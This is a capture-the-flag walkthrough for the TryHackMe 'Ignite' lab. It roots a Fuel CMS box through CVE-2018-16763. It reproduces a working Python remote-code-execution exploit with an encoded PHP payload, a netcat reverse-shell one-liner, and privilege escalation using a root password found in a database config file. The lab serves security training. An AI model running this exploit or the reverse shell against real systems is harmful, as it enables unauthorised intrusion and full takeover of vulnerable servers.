TryHackMe ‘Ignite’ Room Walkthrough

“Root the box! Designed and created by DarkStar7471, built by Paradox.”

Enumeration

Use a simple NMAP scan to enumerate the machine.
-oN is optional and is used to save the output to the target file nmapInitial

nmap -sC -sV -oN nmapInitial [Target ip] 

The nmap scan reveals port 80 and the /fuel page as a disallowed entry from robots.txt. The nmap entry also shows that we will be using the Fuel CMS.

Before checking out the webpage itself, check the CVE entries for Fuel. CVE-2018–16763 for Fuel CMS shows the service is vulnerable to remote code execution (RCE). There is also an exploit provided that uses Python.

The webpage itself seems to be no help so the RCE exploit will probably be the best route. After downloading the exploit, change [Target Address] to the victim IP address. (Be sure to drop the braces ‘[’ around the target address). The code should look as follows:

import requests
import urllib
url = "http:[Target Address]
def find_nth_overlapping(haystack, needle, n):
    start = haystack.find(needle)
    while start >= 0 and n > 1:
        start = haystack.find(needle, start+1)
        n -= 1
    return start

while 1:
	xxxx = raw_input('cmd:')
	burp0_url = url+"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+urllib.quote(xxxx)+"%27%29%2b%27"
	proxy = {"http":"http://127.0.0.1:8080"}
	r = requests.get(burp0_url, proxies=proxy)

	html = "<!DOCTYPE html>"
	htmlcharset = r.text.find(html)

	begin = r.text[0:20]
	dup = find_nth_overlapping(r.text,begin,2)

	print r.text[0:dup]

Initial Attack and Exploit

Run the exploit and we will be able to run commands on the victim machine:

Commands must be included inside quotes otherwise the script will fail. For example “whoami” is acceptable but whoami is not acceptable.

With this exploit we have gained access to the machine through the RCE exploit. We can get the user flag here, or upgrade to a shell first.

To get a shell lets start a netcat listener on our machine:

nc -lnvp 4444

To get a shell run the following command:

cmd:"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc [Tun interface ip] 4444 >/tmp/f"

Update the IP address in the command to the IP address of your machine that is exposed to the victim machine. If connecting to THM through the OpenVPN connection on a Kali Linux machine, the Tun0 interface with IP starting as 10.10.X.X should be used. Double check that the port you are using for netcat matches the port that you specified in the command. In this example, we are using port 4444 to attack the machine.

After running these commands, we should get an interactive shell — still with the access level of www-data. You can get the User Flag from /home/www-data.

Privilege Escalation

To escalate privileges on this machine, we will make use of improperly stored credentials that we can access. These credentials are stored as part of the web files at:

/var/www/html/fuel/application/config/database.php

Here we find the root password as: mememe

To exploit this we simply use su as follows:

su root

With this you can access the /root and cat out the root flag.

su may give output: “su : must be run from a terminal”. In this case use the following command to fi the shell and you will then be able to use su:

/usr/bin/script -qc /bin/bash /dev/null

You should then get a new prefix: www-data@ubutnu:. After this you should be able to continue with su root.